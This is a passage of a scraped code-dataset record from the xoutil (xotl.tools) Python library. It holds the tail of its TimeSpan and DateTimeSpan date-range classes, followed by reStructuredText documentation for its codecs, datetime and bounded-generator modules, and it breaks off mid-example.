self.past_unbound\n\n @property\n def bound(self) -> bool:\n \"True if the time span is not `unbound <unbound>`:attr:.\"\n return not self.unbound\n\n @property\n def valid(self) -> bool:\n \"\"\"A bound time span is valid if it starts before it ends.\n\n Unbound time spans are always valid.\n\n \"\"\"\n if self.bound:\n return self.start_date <= self.end_date\n else:\n return True\n\n def __contains__(self, other):\n # type: (date) -> bool\n \"\"\"Test date `other` is in the time span.\"\"\"\n if isinstance(other, date):\n if isinstance(other, datetime):\n other = other.date()\n if self.start_date and self.end_date:\n return self.start_date <= other <= self.end_date\n elif self.start_date:\n return self.start_date <= other\n elif self.end_date:\n return other <= self.end_date\n else:\n return True\n else:\n return False\n\n def overlaps(self, other):\n # type: (TimeSpan) -> bool\n \"\"\"Test if the time spans overlaps.\"\"\"\n return bool(self & other)\n\n def isdisjoint(self, other):\n # type: (TimeSpan) -> bool\n return not self.overlaps(other)\n\n def __le__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a superset.\"\n return (self & other) == self\n\n issubset = __le__\n\n def __lt__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a proper superset.\"\n return self != other and self <= other\n\n def __gt__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a proper subset.\"\n return self != other and self >= other\n\n def __ge__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a subset.\"\n # Notice that ge is not the opposite of lt.\n return (self & other) == other\n\n issuperset = covers = __ge__\n\n def __iter__(self):\n # type: () -> Iterator[date]\n yield self.start_date\n yield self.end_date\n\n def __getitem__(self, index):\n # type: (int) -> date\n this = tuple(self)\n return this[index]\n\n def __eq__(self, other: Union[date, \"TimeSpan\"]) -> bool: # type: ignore\n if 
isinstance(other, date):\n other = type(self).from_date(other)\n elif isinstance(other, DateTimeSpan):\n return other == self\n if not isinstance(other, TimeSpan):\n return NotImplemented\n return self.start_date == other.start_date and self.end_date == other.end_date\n\n def __hash__(self):\n return hash((TimeSpan, self.start_date, self.end_date))\n\n def __and__(self, other):\n # type: (TimeSpan) -> TimeSpan\n \"\"\"Get the time span that is the intersection with another time span.\n\n If two time spans don't overlap, return `EmptyTimeSpan`:data:.\n\n If `other` is not a TimeSpan we try to create one. If `other` is a\n date, we create the TimeSpan that starts and end that very day. Other\n types are passed unchanged to the constructor.\n\n When `other` is a `DateTimeSpan`:class:, convert `self` to a `date\n time span <DateTimeSpan.from_timespan>`:meth: before doing the\n intersection.\n\n \"\"\"\n from xotl.tools.infinity import Infinity\n\n if isinstance(other, _EmptyTimeSpan):\n return other\n elif isinstance(other, date):\n other = TimeSpan.from_date(other)\n elif isinstance(other, DateTimeSpan):\n return other & self\n elif not isinstance(other, TimeSpan):\n raise TypeError(\"Invalid type '%s'\" % type(other).__name__)\n start = max(self.start_date or -Infinity, other.start_date or -Infinity)\n end = min(self.end_date or Infinity, other.end_date or Infinity)\n if start <= end:\n if start is -Infinity:\n start = None\n if end is Infinity:\n end = None\n return type(self)(start, end)\n else:\n return EmptyTimeSpan\n\n __mul__ = __rmul__ = __rand__ = __and__\n\n def __bool__(self):\n return True\n\n __nonzero__ = __bool__\n\n def __len__(self):\n \"\"\"The amount of dates in the span.\n\n .. warning:: If the time span is `unbound`:attr: this method returns\n NotImplemented. This will make python complain with a\n TypeError.\n\n .. 
versionadded:: 1.8.2\n\n \"\"\"\n if self.bound:\n return (self.end_date - self.start_date).days\n else:\n return NotImplemented\n\n def __lshift__(self, delta):\n \"\"\"Return the time span displaced to the past in `delta`.\n\n :param delta: The number of days to displace. It can be either an\n integer or a `datetime.timedelta`:class:. The integer\n will be converted to ``timedelta(days=delta)``.\n\n .. note:: Delta values that don't amount to at least a day will be the\n same as 0.\n\n .. versionadded:: 1.8.2\n\n .. warning:: Python does have a boundaries for the dates it can\n represent, so displacing a TimeSpan can cause OverflowError.\n\n \"\"\"\n import numbers\n\n if isinstance(delta, numbers.Integral):\n delta = timedelta(days=delta) # noqa\n start = self.start_date - delta if self.start_date else None\n end = self.end_date - delta if self.end_date else None\n return type(self)(start, end)\n\n def __rshift__(self, delta):\n \"\"\"Return the time span displaced to the future in `delta`.\n\n :param delta: The number of days to displace. It can be either an\n integer or a `datetime.timedelta`:class:. The integer\n will be converted to ``timedelta(days=delta)``.\n\n .. note:: Delta values that don't amount to at least a day will be the\n same as 0.\n\n .. versionadded:: 1.8.2\n\n .. 
warning:: Python does have a boundaries for the dates it can\n represent, so displacing a TimeSpan can cause OverflowError.\n\n \"\"\"\n return self << -delta\n\n def intersection(self, *others):\n \"Return ``self [& other1 & ...]``.\"\n import operator\n from functools import reduce\n\n return reduce(operator.mul, others, self)\n\n def diff(self, other):\n # type: (TimeSpan) -> Tuple[TimeSpan, TimeSpan]\n \"\"\"Return the two time spans which (combined) contain all the dates in\n `self` which are not in `other`.\n\n Notice this method returns a tuple of exactly two items.\n\n If `other` and `self` don't overlap, return ``(self, EmptyTimeSpan)``.\n\n If ``self <= other`` is True, return the tuple with the empty time\n span in both positions.\n\n Otherwise `self` will have some dates which are not in `other`; there\n are possible three cases:\n\n a) other starts before or at self's start date; return the empty time\n span and the time span containing the dates after `other.end_date`\n up to `self.end_date`\n\n b) other ends at or after self's end date; return the dates from\n `self.start_date` up to the date before `other.start_date` and the\n empty time span.\n\n c) `other` is fully contained in `self`; return two non-empty time\n spans as in the previous cases.\n\n .. 
versionadded:: 1.9.7\n\n \"\"\"\n if not self & other:\n return self, EmptyTimeSpan # type: ignore\n other = self & other\n if self == other:\n return EmptyTimeSpan, EmptyTimeSpan # type: ignore\n else:\n assert self > other\n day = timedelta(days=1)\n if self.start_date == other.start_date:\n return (\n EmptyTimeSpan, # type: ignore\n TimeSpan(other.end_date + day, self.end_date),\n )\n elif self.end_date == other.end_date:\n return (\n TimeSpan(self.start_date, other.start_date - day),\n EmptyTimeSpan,\n )\n else:\n return (\n TimeSpan(self.start_date, other.start_date - day),\n TimeSpan(other.end_date + day, self.end_date),\n )\n\n def __repr__(self):\n start, end = self\n return \"TimeSpan(%r, %r)\" % (\n start.isoformat() if start else None,\n end.isoformat() if end else None,\n )\n\n __str__ = __repr__\n\n\nclass _EmptyTimeSpan:\n __slots__ = [] # no inner structure\n\n def __bool__(self):\n return False\n\n __nonzero__ = __bool__\n\n def __contains__(self, which):\n return False # I don't contain noone\n\n # The empty is equal only to itself\n def __eq__(self, which):\n if isinstance(which, (TimeSpan, date, _EmptyTimeSpan)):\n # We expect `self` to be a singleton, but pickle protocol 1 does\n # not warrant to call our __new__.\n return self is which\n else:\n return NotImplemented\n\n def __ne__(self, other):\n res = self == other\n if res is not NotImplemented:\n return not res\n else:\n return res\n\n # The empty set is a subset of any other set. dates are regarded as the\n # set that contains that\n def __le__(self, which):\n if isinstance(which, (TimeSpan, date, _EmptyTimeSpan)):\n return True\n else:\n return NotImplemented\n\n # The empty set is only a superset of itself.\n __ge__ = covers = __eq__\n\n # The empty set is a *proper* subset of any set but itself. 
The empty\n # set is disjoint with any other set but itself.\n __lt__ = isdisjoint = __ne__\n\n # The empty set is a *proper* superset of no one\n def __gt__(self, which):\n if isinstance(which, (TimeSpan, date, _EmptyTimeSpan)):\n return True\n else:\n return NotImplemented\n\n # `empty | x == empty + x == x`\n def __add__(self, which):\n if isinstance(which, (TimeSpan, date, _EmptyTimeSpan)):\n return which\n else:\n raise TypeError\n\n __or__ = __add__\n\n # `empty & x == empty * x == empty`\n def __mul__(self, other):\n if isinstance(other, (TimeSpan, date, _EmptyTimeSpan)):\n return self\n else:\n raise TypeError\n\n __and__ = __mul__\n\n def __repr__(self):\n return \"EmptyTimeSpan\"\n\n __str__ = __repr__\n\n def __new__(cls):\n res = getattr(cls, \"_instance\", None)\n if res is None:\n res = cls._instance = super().__new__(cls)\n return res\n\n def __reduce__(self):\n # So that unpickling returns the singleton\n return type(self), ()\n\n def __len__(self):\n return 0\n\n def __lshift__(self, delta):\n return self\n\n def __rshift__(self, delta):\n return self\n\n\n# I solemnly swear that EmptyTimeSpan is of type DateTimeSpan.\nEmptyTimeSpan = _EmptyTimeSpan()\n\n\n# TODO: Move this to xotl.tools.objects or somewhere else\nclass SynchronizedField(object):\n \"\"\"A synchronized descriptor.\n\n Whenever the `source` gets updated, update the second.\n\n \"\"\"\n\n def __init__(self, descriptor, setting_descriptor, set_throu_get=True):\n self.descriptor = descriptor\n self.setting_descriptor = setting_descriptor\n self.set_throu_get = set_throu_get\n\n def __get__(self, instance, owner):\n return self.descriptor.__get__(instance, owner)\n\n def __set__(self, instance, value):\n from xotl.tools.context import context\n\n self.descriptor.__set__(instance, value)\n if (SynchronizedField, self.setting_descriptor) not in context:\n with context((SynchronizedField, self.setting_descriptor)):\n if self.set_throu_get:\n value = self.__get__(instance, type(instance))\n 
self.setting_descriptor.__set__(instance, value)\n\n\nclass DateTimeSpan(TimeSpan):\n \"\"\"A *continuous* span of time (with datetime at each boundary).\n\n `DateTimeSpan`:class: is a minor extension of `TimeSpan`:class:, and is a\n subclass.\n\n DateTimeSpan objects are iterable. They yield exactly two datetimes:\n first the start date, and then the end date::\n\n >>> ts = DateTimeSpan('2017-08-01 11:00', '2017-09-01 23:00')\n >>> tuple(ts)\n (datetime(2017, 8, 1, 11, 0), date(2017, 9, 1, 23, 0))\n\n The API of DateTimeSpan is just the natural transformation of the API of\n `TimeSpan`:class:.\n\n The `start_date` and `end_date` attributes are interlocked with the\n `start_datetime` and `end_datetime`. By changing `start_date`, you also\n change `start_datetime` with the same date at 00:00 without tzinfo. By\n setting `start_datetime` you also update `start_date`. By setting\n `end_date` you also update `end_datetime` with the same date at 23:59:59\n without tzinfo.\n\n .. versionadded:: 1.9.7\n\n .. warning:: DateTimeSpan is provided on a provisional basis. 
Future\n releases can change its API or remove it completely.\n\n \"\"\"\n\n start_datetime = SynchronizedField(\n DateTimeField(\"start_datetime\", nullable=True), TimeSpan.start_date\n )\n end_datetime = SynchronizedField(\n DateTimeField(\"end_datetime\", nullable=True, prefer_last_minute=True),\n TimeSpan.end_date,\n )\n start_date = SynchronizedField(TimeSpan.start_date, start_datetime.descriptor)\n end_date = SynchronizedField(TimeSpan.end_date, end_datetime.descriptor)\n\n def __init__(self, start_datetime=None, end_datetime=None):\n # Don't call super because our fields are synchronized.\n self.start_datetime = start_datetime\n self.end_datetime = end_datetime\n\n @classmethod\n def from_datetime(self, dt):\n # type: (datetime) -> DateTimeSpan\n \"\"\"Return a new date time span that covers a single `datetime`.\n\n If `dt` is actually a date, the start_datetime will be at '00:00:00'\n and the end_datetime will be at '23:59:59'.\n\n \"\"\"\n return self(start_datetime=dt, end_datetime=dt)\n\n @classmethod\n def from_timespan(self, ts):\n # type: (TimeSpan) -> DateTimeSpan\n \"\"\"Return a new date time span from a timespan.\n\n Notice the start datetime will be set at '00:00:00' and the end\n datetime at '23:59:59'.\n\n If `ts` is already a DateTimeSpan, return it unchanged.\n\n \"\"\"\n if isinstance(ts, DateTimeSpan):\n return ts\n else:\n return self(start_datetime=ts.start_date, end_datetime=ts.end_date)\n\n @property\n def past_unbound(self):\n # type: () -> bool\n \"True if the time span is not bound into the past.\"\n return self.start_datetime is None\n\n @property\n def future_unbound(self):\n # type: () -> bool\n \"True if the time span is not bound into the future.\"\n return self.end_datetime is None\n\n @property\n def unbound(self):\n # type: () -> bool\n \"\"\"True if the time span is `unbound into the past <past_unbound>`:attr: or\n `unbount into the future <future_unbound>`:attr: or both.\n\n \"\"\"\n return self.future_unbound or 
self.past_unbound\n\n @property\n def bound(self):\n # type: () -> bool\n \"True if the time span is not `unbound <unbound>`:attr:.\"\n return not self.unbound\n\n @property\n def valid(self):\n # type: () -> bool\n \"\"\"A bound time span is valid if it starts before it ends.\n\n Unbound time spans are always valid.\n\n \"\"\"\n if self.bound:\n return self.start_datetime <= self.end_datetime\n else:\n return True\n\n def __contains__(self, other):\n # type: (date) -> bool\n \"\"\"Test if datetime `other` is in the datetime span.\n\n If `other` is a `~datetime.date`:class:, we convert it to a naive\n datetime at midnight (00:00:00).\n\n \"\"\"\n if isinstance(other, date):\n if not isinstance(other, datetime):\n other = datetime( # type: ignore\n other.year, other.month, other.day\n )\n if self.start_datetime and self.end_datetime:\n return self.start_datetime <= other <= self.end_datetime\n elif self.start_datetime:\n return self.start_datetime <= other\n elif self.end_datetime:\n return other <= self.end_datetime\n else:\n return True\n else:\n return False\n\n def overlaps(self, other):\n # type: (TimeSpan) -> bool\n \"\"\"Test if the time spans overlaps.\"\"\"\n return bool(self & other)\n\n def isdisjoint(self, other):\n # type: (TimeSpan) -> bool\n return not self.overlaps(other)\n\n def __le__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a superset.\"\n return (self & other) == self\n\n issubset = __le__\n\n def __lt__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a proper superset.\"\n return self != other and self <= other\n\n def __gt__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a proper subset.\"\n return self != other and self >= other\n\n def __ge__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a subset.\"\n # Notice that ge is not the opposite of lt.\n return (self & other) == other\n\n issuperset = covers = __ge__\n\n def __iter__(self) -> Iterator[datetime]: # type: 
ignore\n yield self.start_datetime\n yield self.end_datetime\n\n def __getitem__(self, index) -> datetime: # type: ignore\n this = tuple(self)\n return this[index]\n\n def __eq__(self, other):\n if isinstance(other, date):\n other = type(self).from_datetime(other)\n elif isinstance(other, TimeSpan) and not isinstance(\n other, DateTimeSpan\n ): # noqa\n other = self.from_timespan(other)\n elif not isinstance(other, DateTimeSpan):\n return NotImplemented\n return (\n self.start_datetime == other.start_datetime\n and self.end_datetime == other.end_datetime\n )\n\n def __hash__(self):\n return hash((DateTimeSpan, self.start_datetime, self.end_datetime))\n\n def __and__(self, other):\n # type: (TimeSpan) -> DateTimeSpan\n \"\"\"Get the date time span that is the intersection with another time span.\n\n If two time spans don't overlap, return the object\n `EmptyTimeSpan`:any:.\n\n If `other` is not a DateTimeSpan we try to create one. If `other` is\n a date/datetime, we create use `from_datetime`:meth:. If `other` is\n TimeSpan we use `from_timespan`:meth:. 
Other types are passed\n unchanged to the constructor.\n\n \"\"\"\n from xotl.tools.infinity import Infinity\n\n if isinstance(other, _EmptyTimeSpan):\n return other\n elif isinstance(other, date):\n other = DateTimeSpan.from_datetime(other)\n elif isinstance(other, TimeSpan):\n other = DateTimeSpan.from_timespan(other)\n elif not isinstance(other, TimeSpan):\n raise TypeError(\"Invalid type '%s'\" % type(other).__name__)\n start = max(self.start_datetime or -Infinity, other.start_datetime or -Infinity)\n end = min(self.end_datetime or Infinity, other.end_datetime or Infinity)\n if start <= end:\n if start is -Infinity:\n start = None\n if end is Infinity:\n end = None\n return type(self)(start, end)\n else:\n return EmptyTimeSpan\n\n __mul__ = __rmul__ = __rand__ = __and__\n\n def __bool__(self):\n # type: () -> bool\n return True\n\n __nonzero__ = __bool__\n\n def __lshift__(self, delta):\n # type: (Union[int, timedelta]) -> DateTimeSpan\n \"\"\"Return the date time span displaced to the past in `delta`.\n\n :param delta: The number of days to displace. It can be either an\n integer or a `datetime.timedelta`:class:. The integer\n will be converted to ``timedelta(days=delta)``.\n\n .. warning:: Python does have a boundaries for the dates it can\n represent, so displacing can cause OverflowError.\n\n \"\"\"\n import numbers\n\n if isinstance(delta, numbers.Integral):\n delta = timedelta(days=delta)\n start = self.start_datetime - delta if self.start_datetime else None\n end = self.end_datetime - delta if self.end_datetime else None\n return type(self)(start, end)\n\n def __rshift__(self, delta):\n # type: (Union[int, timedelta]) -> DateTimeSpan\n \"\"\"Return the date time span displaced to the future in `delta`.\n\n :param delta: The number of days to displace. It can be either an\n integer or a `datetime.timedelta`:class:. The integer\n will be converted to ``timedelta(days=delta)``.\n\n .. 
warning:: Python does have a boundaries for the dates it can\n represent, so displacing can cause OverflowError.\n\n \"\"\"\n return self << -delta\n\n def intersection(self, *others):\n # type: (TimeSpan) -> DateTimeSpan\n \"Return ``self [& other1 & ...]``.\"\n import operator\n from functools import reduce\n\n return reduce(operator.mul, others, self)\n\n def diff(self, other):\n # type: (TimeSpan) -> Tuple[DateTimeSpan, DateTimeSpan]\n \"\"\"Return the two datetime spans which (combined) contain all the\n seconds in `self` which are not in `other`.\n\n Notice this method returns a tuple of exactly two items.\n\n If `other` and `self` don't overlap, return ``(self, EmptyTimeSpan)``.\n\n If ``self <= other`` is True, return the tuple with the empty time\n span in both positions.\n\n Otherwise `self` will have some datetimes which are not in `other`;\n there are possible three cases:\n\n a) other starts before or at self's start datetime; return the empty\n time span and the datetime span from the second after\n `other.end_datetime` up to `self.end_datetime`\n\n b) other ends at or after self's end date; return the datetime span\n from `self.start_datetime` up to the second before\n `other.start_datetime` and the empty time span.\n\n c) `other` is fully contained in `self`; return two non-empty datetime\n spans as in the previous cases.\n\n \"\"\"\n if not self & other:\n return self, EmptyTimeSpan\n other = self & other\n if self == other:\n return EmptyTimeSpan, EmptyTimeSpan\n else:\n assert self > other\n sec = timedelta(seconds=1)\n if self.start_datetime == other.start_datetime:\n return (\n EmptyTimeSpan,\n DateTimeSpan(other.end_datetime + sec, self.end_datetime),\n )\n elif self.end_datetime == other.end_datetime:\n return (\n DateTimeSpan(self.start_datetime, other.start_datetime - sec),\n EmptyTimeSpan,\n )\n else:\n return (\n DateTimeSpan(self.start_datetime, other.start_datetime - sec),\n DateTimeSpan(other.end_datetime + sec, self.end_datetime),\n 
)\n\n def __repr__(self):\n start, end = self\n return \"DateTimeSpan(%r, %r)\" % (\n start.isoformat().replace(\"T\", \" \") if start else None,\n end.isoformat().replace(\"T\", \" \") if end else None,\n )\n\n __str__ = __repr__\n\n\ndel IntEnum\n" }, { "alpha_fraction": 0.6356736421585083, "alphanum_fraction": 0.6432637572288513, "avg_line_length": 28.27777862548828, "blob_id": "5f4a5f2dfc2bb2ca1166308e101e227de015dc4a", "content_id": "0158edd2b5a629946c8a65e3502a07f25d4d7226", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 527, "license_type": "permissive", "max_line_length": 77, "num_lines": 18, "path": "/docs/source/xotl.tools/future/codecs.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.codecs`:mod: - Codec registry, base classes and tools\n========================================================================\n\n.. module:: xotl.tools.future.codecs\n\nThis module extends the standard library's `functools`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: force_encoding\n\n.. autofunction:: safe_decode\n\n.. 
autofunction:: safe_encode\n" }, { "alpha_fraction": 0.6255130767822266, "alphanum_fraction": 0.6289864182472229, "avg_line_length": 21.949275970458984, "blob_id": "1b678a1b5c12d393f5c01378854dc889dacd5d1c", "content_id": "3b33cd97b777f6115fae2357def804a457711227", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3168, "license_type": "permissive", "max_line_length": 77, "num_lines": 138, "path": "/docs/source/xotl.tools/future/datetime.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.datetime`:mod: - Basic date and time types\n=============================================================\n\n.. module:: xotl.tools.future.datetime\n\nThis module extends the standard library's `datetime`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nIn Pytnon versions <= 3 date format fails for several dates, for example\n``date(1800, 1, 1).strftime(\"%Y\")``. So, classes `~datetime.date`:class: and\n`~datetime.datetime`:class: are redefined if that case.\n\nThis problem could be solved by redefining the `strftime` function in the\n`time` module, because it is used for all `strftime` methods; but (WTF),\nPython double checks the year (in each method and then again in\n`time.strftime` function).\n\n.. autofunction:: assure\n\nWe added the following features.\n\n.. autofunction:: strfdelta\n.. autofunction:: strftime\n.. autofunction:: get_month_first\n.. autofunction:: get_month_last\n.. autofunction:: get_next_month\n.. autofunction:: is_full_month\n\n.. autoclass:: flextime\n\n.. autofunction:: daterange([start,] stop[, step])\n\n.. autoclass:: DateField\n\n.. autoclass:: TimeSpan\n\n .. automethod:: from_date\n\n .. autoattribute:: past_unbound\n .. autoattribute:: future_unbound\n .. 
autoattribute:: unbound\n .. autoattribute:: bound\n .. autoattribute:: valid\n\n .. automethod:: __le__\n .. method:: issubset\n\n An alias for `__le__`:meth:.\n\n .. automethod:: __ge__\n .. method:: issuperset\n\n An alias for `__ge__`:meth:.\n\n .. method:: covers\n\n An alias for `__ge__`:meth:.\n\n .. automethod:: isdisjoint\n .. automethod:: overlaps\n\n .. automethod:: __contains__\n\n .. automethod:: __and__\n .. method:: __mul__\n\n An alias for `__and__`:meth:.\n\n .. automethod:: intersection\n\n .. automethod:: __lshift__\n\n .. automethod:: __rshift__\n\n .. automethod:: __len__\n\n .. automethod:: diff\n\n\n.. autoclass:: DateTimeSpan\n\n .. automethod:: from_datetime\n .. automethod:: from_timespan\n\n .. autoattribute:: past_unbound\n .. autoattribute:: future_unbound\n .. autoattribute:: unbound\n .. autoattribute:: bound\n .. autoattribute:: valid\n\n .. automethod:: __le__\n .. method:: issubset\n\n An alias for `__le__`:meth:.\n\n .. automethod:: __ge__\n .. method:: issuperset\n\n An alias for `__ge__`:meth:.\n\n .. method:: covers\n\n An alias for `__ge__`:meth:.\n\n .. automethod:: isdisjoint\n .. automethod:: overlaps\n\n .. automethod:: __contains__\n\n .. automethod:: __and__\n .. method:: __mul__\n\n An alias for `__and__`:meth:.\n\n .. automethod:: intersection\n\n .. automethod:: __lshift__\n\n .. automethod:: __rshift__\n\n .. automethod:: __len__\n\n .. automethod:: diff\n\n\n.. data:: EmptyTimeSpan\n\n The empty time span. It's not an instance of `TimeSpan`:class: but engage\n set-like operations: union, intersection, etc.\n\n No date is a member of the empty time span. The empty time span is a\n proper subset of any time span. It's only a superset of itself. 
It's not\n a proper superset of any other time span nor itself.\n\n This instance is a singleton.\n" }, { "alpha_fraction": 0.7089315056800842, "alphanum_fraction": 0.7105647921562195, "avg_line_length": 35.1273307800293, "blob_id": "ad9376f16fc9e7953a494ecc082b4e4a572b2079", "content_id": "55dc43544281e802dca68608653848a85d614620", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 11633, "license_type": "permissive", "max_line_length": 78, "num_lines": 322, "path": "/docs/source/xotl.tools/bound.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=========================================================================\n `xotl.tools.bound`:mod: -- Helpers for bounded execution of co-routines\n=========================================================================\n\n.. module:: xotl.tools.bound\n\n.. versionadded:: 1.6.3\n\n\n\nA bounded execution model\n=========================\n\nSome features are easy to implement using a generator or co-routine\n(`342`:pep:). For instance, you might want to \"report units of work\" one at a\ntime. These kind of features could be easily programmed without any `bounds`\nwhatsoever, and then you might \"weave\" the bounds.\n\nThis module helps to separate the work-doing function from the boundary-tests\ndefinitions.\n\nThis document uses the following terminology:\n\n.. glossary::\n\n unbounded function\n\n This is the function that does the actual work without testing for any\n `boundary condition`:term:. Boundary conditions are not \"natural\n causes\" of termination for the algorithm but conditions imposed\n elsewhere: the environment, resource management, etc.\n\n This function *must* return a generator, called the `unbounded\n generator`:term:.\n\n unbounded generator\n\n The generator returned by an `unbounded function`:term:. 
This generator\n is allowed to yield forever, although it could terminate by itself. So\n this is actually a `possibly` unbounded generator, but we keep the term\n to emphasize.\n\n boundary condition\n\n It's a condition that does not belong to the logical description of any\n algorithm. When this condition is met it indicates that the `unbounded\n generator`:term: should be closed. The boundary condition is tested\n each time the unbounded generator yields.\n\n A boundary condition is usually implemented in a single function called\n the `boundary definition`:term:.\n\n boundary definition\n\n A function that implements a boundary condition. This function must\n comply with the boundary protocol (see `boundary`:func:).\n\n Sometimes we identify the boundary condition with its `boundary\n definition`.\n\n bounded function\n\n It's the result of applying a `boundary definition` to an `unbounded\n function`.\n\n bounded generator\n\n It's the result of applying a `boundary condition` to an `unbounded\n generator`.\n\n\nThe bounded execution model takes at least an `unbounded generator` and a\n`boundary condition`. Applying the boundary condition to the unbounded\ngenerator ultimately results in a `bounded generator`, which will behave\nalmost equivalently to the `unbounded generator` but will stop when the\nboundary condition yields True or when the unbounded generator itself is\nexhausted.\n\n\nIncluded boundary conditions\n============================\n\n.. autofunction:: timed(maxtime)\n\n.. autofunction:: times(n)\n\n.. autofunction:: accumulated(mass, *attrs, initial=0)\n\n.. autofunction:: pred(func, skipargs=True)\n\n.. autofunction:: until_errors(*errors)\n\n.. autofunction:: until(time=None, times=None, errors=None)\n\n\nChaining several boundary conditions\n====================================\n\nTo created a more complex boundary than the one provided by a single condition\nyou could use the following high-level boundaries:\n\n.. 
autofunction:: whenany(*boundaries)\n\n.. autofunction:: whenall(*boundaries)\n\n\nDefining boundaries\n===================\n\nIf none of the boundaries defined deals with a boundary condition you have,\nyou may create another one using `boundary`:func:. This is usually employed\nas decorator on the `boundary definition`:term:.\n\n.. autofunction:: boundary(definition)\n\n\nIllustration of a boundary\n--------------------------\n\nLet's explain in detail the implementation of `times`:func: as an example of\nhow a boundary condition could be implemented.\n\n\n.. code-block:: python\n :linenos:\n\n @boundary\n def times(n):\n '''Becomes True after the `nth` item have been produced.'''\n passed = 0\n yield False\n while passed < n:\n\t yield False\n\t passed += 1\n yield True\n\nWe implemented the boundary condition via the `boundary`:func: helper. This\nhelpers allows to implement the boundary condition via a boundary definition\n(the function above). The ``boundary`` helper takes the definition and builds\na `BoundaryCondition`:class: instance. This instance can then be used to\ndecorate the `unbounded function`, returning a `bounded function` (a\n`Bounded`:class: instance).\n\nWhen the `bounded function` is called, what actually happens is that:\n\n- First the boundary condition is invoked passing the ``n`` argument, and thus\n we obtain the generator from the ``times`` function.\n\n- We also get the generator from the unbounded function.\n\n- Then we call ``next(boundary)`` to allow the ``times`` boundary to\n initialize itself. This runs the code of the ``times`` definition up to the\n line 5 (the first ``yield`` statement).\n\n- The `bounded function` ignores the message from the boundary at this point.\n\n- Then it sends the arguments passed to original function via the ``send()``\n method of the boundary condition generator.\n\n- This unfreezes the boundary condition that now tests whether ``passes`` is\n less that ``n``. 
If this is true, the boundary yields False and suspends\n there at line 7.\n\n- The `bounded function` see that message is not True and asks the `unbounded\n generator` for its next value.\n\n- Then it sends that value to the boundary condition generator, which resumes\n execution at line 8. The value sent is ignored and ``passes`` gets\n incremented by 1.\n\n- Again the generator asks if ``passes`` is less that ``n``. If passes has\n reached ``n``, it will execute line 9, yielding True.\n\n- The `bounded function` see that the boundary condition is True and calls the\n ``close()`` method to the boundary condition generator.\n\n- This is like raising a GeneratorExit just after resuming the ``times`` below\n line 9. The error is not trapped and propagates the ``close()`` method of\n the generator knows this means the generator has properly finished.\n\n .. note:: Other boundaries might need to deal with GeneratorExit explicitly.\n\n- Then the `bounded function` regains control and calls the ``close()`` method\n of the `unbounded generator`, this effectively raises a GeneratorExit inside\n the unbounded generator, which if untreated means everything went well.\n\n\nIf you look at the implementation of the `included boundary conditions`_,\nyou'll see that all have the same pattern:\n\na) Initialization code, followed by a ``yield False`` statement. This is a\n clear indicator that the included boundary conditions disregard the first\n message (the arguments to the unbounded function).\n\nb) A looping structure that tests the condition has not been met and yields\n False at each cycle.\n\nc) The ``yield True`` statement outside the loop to indicate the boundary\n condition has been met.\n\nThis pattern is not an accident. Exceptionally `whenall`:func: and\n`whenany`:func: lack the first standalone `yield False` because they must not\nassume all its subordinate predicates will ignore the first message.\n\n\nInternal API\n============\n\n.. 
autoclass:: Bounded\n :members: __call__, generate\n\n This class is actually subclassed inside the\n `~BoundaryCondition.apply`:meth: so that the weaving boundary definition\n with the `target` unbounded function is not exposed.\n\n.. autoclass:: BoundaryCondition\n :members:\n\n.. _celery: http://docs.celeryproject.org/\n\n\nAn example: time bounded batch processing\n=========================================\n\nWe have a project in which we need to send emails inside a `cron` task\n(celery_ is not available). Emails to be sent are placed inside an `Outbox`\nbut we may only spent about 60 seconds to send as many emails as we can. If\nour emails are reasonably small (i.e will be delivered to the SMTP server in a\nfew miliseconds) we could use the `timed`:func: predicate to bound the\nexecution of the task::\n\n @timed(50)\n def send_emails():\n outbox = Outbox.open()\n try:\n for message in outbox:\n emailbackend.send(message)\n outbox.remove(message)\n yield message\n except GeneratorExit:\n # This means the time we were given is off.\n pass\n finally:\n outbox.close() # commit the changes to the outbox\n\nNotice that you **must** enclose your batch-processing code in a ``try``\nstatement if you need to somehow commit changes. Since we may call the\n``close()`` method of the generator to signal that it must stop.\n\nA ``finally`` clause is not always appropriated cause an error that is not\nGeneratorExit error should not commit the data unless you're sure data changes\nthat were made before the error could be produced. In the code above the only\nplace in the code above where an error could happen is the sending of the\nemail, and the data is only touched for each email that is actually sent. 
So\nwe can safely close our outbox and commit the removal of previous message from\nthe outbox.\n\n\nUsing the `Bounded.generate`:meth: method\n=========================================\n\nCalling a `bounded generator` simply returns the last valued produced by the\n`unbounded generator`, but sometimes you need to actually *see* all the values\nproduced. This is useful if you need to meld several `generators` with\npartially overlapping boundary conditions.\n\nLet's give an example by extending a bit the example given in the previous\nsection. Assume you now need to extend your cron task to also read an Inbox\nas much as it can and then send as many messages as it can. Both things\nshould be done under a given amount of time, however the accumulated size of\nsent messages should not surpass a threshold of bytes to avoid congestion.\n\nFor this task you may use both `timed`:func: and `accumulated`:func:. But you\nmust apply `accumulated`:func: only to the process of sending the messages and\nthe `timed` boundary to the overall process.\n\nThis can be accomplished like this:\n\n.. code-block:: python\n :linenos:\n\n def communicate(interval, bandwidth):\n from itertools import chain as meld\n\n def receive():\n for 